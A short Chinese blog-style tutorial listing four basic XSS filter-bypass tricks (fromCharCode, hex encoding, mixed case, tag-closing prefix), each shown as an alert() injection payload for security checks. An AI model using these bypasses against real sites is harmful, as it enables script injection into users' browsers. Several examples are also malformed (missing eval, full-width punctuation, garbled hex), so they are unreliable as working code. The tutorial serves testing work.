XSS绕过技术 XSS插入绕过一些方式总结

XSS绕过技术 XSS插入绕过一些方式总结 我们友情进行XSS检查，偶然跳出个小弹窗，其中我们总结了一些平时可能用到的XSS插入方式，方便我们以后进行快速检查，也提供了一定的思路，其中XSS有反射、存储、DOM这三类，至于具体每个类别的异同之处，本文不做学术介绍，直接介绍实际的插入方式

　　0x00前言

　　我们友情进行XSS检查，偶然跳出个小弹窗，其中我们总结了一些平时可能用到的XSS插入方式，方便我们以后进行快速检查，也提供了一定的思路，其中XSS有反射、存储、DOM这三类，至于具体每个类别的异同之处，本文不做学术介绍，直接介绍实际的插入方式。

　　四种超级基础的绕过方法。

　　1.转换为ASCII码

　　例子：原脚本为<script>alert（‘I love F4ck’）</script >

　　通过转换，变成：

　　<script>String.fromCharCode（97, 108, 101, 114, 116, 40, 8216, 73, 32, 108, 111, 118, 101, 32, 70, 52, 99, 107, 8217, 41） </script>

　　2.转换为HEX（十六进制）

　　例子：原脚本为<script>alert（‘I love F4ck’）</script>

　　通过转换，变成：

　　%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%2018%49%20%6c%6f%76%65%20%46%34%63%6b%2019%29%3c%2f%73%63%72%69%70%74%3e

　　3.转换脚本的大小写

　　例子：原脚本为<script>alert（‘I love F4ck’）</script>

　　转换为：<ScRipt>AleRt（‘I love F4ck’）</sCRipT>

　　4.增加闭合标记”>

　　例子：原脚本为<script>alert（‘I love F4ck’）</script>

　　转换为：”><script>alert（‘I love F4ck’）</script>